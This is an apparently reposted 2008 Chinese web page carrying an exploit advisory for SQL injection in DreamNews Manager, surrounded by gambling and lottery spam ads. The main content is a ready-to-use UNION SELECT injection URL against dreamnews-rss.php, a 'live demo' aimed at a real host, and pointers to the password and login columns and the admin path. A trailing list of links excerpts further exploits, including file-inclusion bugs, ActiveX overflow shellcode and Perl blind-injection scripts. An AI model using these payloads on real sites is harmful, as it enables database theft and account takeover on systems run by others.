??斗地主捕鱼电竞提现秒到 广告位招租 - 15元/月全站展示
??支付宝搜索579087183领大额红包 ??伍彩集团官网直营彩票
??好待遇→招代理 ??伍彩集团官网直营彩票
??络茄网 广告位招租 - 15元/月全站展示
DreamNews Manager (id) Remote SQL Injection Vulnerability

转载   佚名   2008-10-08   浏览量:327


#########################################################
#
# dreamnews ( rss) Remote SQL Injection Vulnerability
#========================================================
# Author: Hussin X =
# =
# Home : www.tryag.cc/cc =
# =
# email: darkangel_g85[at]Yahoo[DoT]com =
# =
#=========================================================
#
# script : //dreamlevels.com/dreamnews.php
#
# DorK : N/A
#
##########################################################

Exploit:

www.[target].com/Script/dreamnews-rss.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(user(),version(),database()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--


L!VE DEMO:

//dreamlevels.com/demo/dreamnews/dreamnews-rss.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(user(),version(),database()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--


column_name :

user_password
user_login



Admin Login :

/admin/

########################( Greetz )###########################
# #
# tryag.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUR /str0ke #
# #
# Iraqihack / FAHD / mos_chori / Silic0n #
# #
#############################################################

Im IRAQi

转载自://www.jb51.net/hack/5761.html

招聘 不方便扫码就复制添加关注:程序员招聘谷,微信号:jobs1024



Wysi Wiki Wyg 1.0 (index.php c) Local File Inclusion Vulnerability
--== ========================================================= ==-- --== Wizi Wiki Wig Local File Inclusion Vulnerability ==-- --== ========================================================= ==-- [*] Discovered By: StAkeR ~ [email protected]
DreamNews Manager (id) Remote SQL Injection Vulnerability
######################################################### # # dreamnews ( rss) Remote SQL Injection Vulnerability #======================================================== # Author: Hussin X = #
phpDatingClub (website.php page) Local File Inclusion Vulnerability
######################################################### # # phpDatingClub Local File Include Vulnerability #======================================================== # = # Author: Big Ben
gapicms 9.0.2 (dirDepth) Remote File Inclusion Vulnerability
###################################################################################################### gapicms v9.0.2 (dirDepth) Remote File Inclusion Vulnerability ###############################################################################
Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit
<html> <body> <object classid=clsid:32E26FD9-F435-4A20-A561-35D4B987CFDC id=target /> </object> <script language=javascript> // k`sOSe 08/08/2008 // tested in IE6, XP SP1 var shellcode = unescape("
Quicksilver Forums 1.4.1 forums[] Remote SQL Injection Exploit
<?php /* . vuln.: Quicksilver Forums 1.4.1 (forums[]) Remote SQL Injection Exploit . download: //www.quicksilverforums.com/ . . author: irk4z[at]yahoo.pl . homepage: //irk4z.wordpress.com/ . . greets: all friends ;) .
Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF PoC
var body='<OBJECT CLASSID="CLSID:C932BA85-4374-101B-A56C-00AA003668DC" width="10"><PARAM NAME="Mask" VALUE="'; var body1='"></OBJECT>'; var buf='';
MojoJobs (mojoJobs.cgi mojo) Blind SQL Injection Exploit
#!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if(!$ARGV[1]) { print " n"; print " #################### Viva IslaMe Viva IslaMe #############
MojoPersonals (mojoClassified.cgi mojo) Blind SQL Injection Exploit
#!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if(!$ARGV[1]) { print " n"; print " #################### Viva IslaMe Viva IslaMe #############
MojoAuto (mojoAuto.cgi mojo) Blind SQL Injection Exploit
#!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if(!$ARGV[1]) { print " n"; print " #################### Viva IslaMe Viva IslaMe #############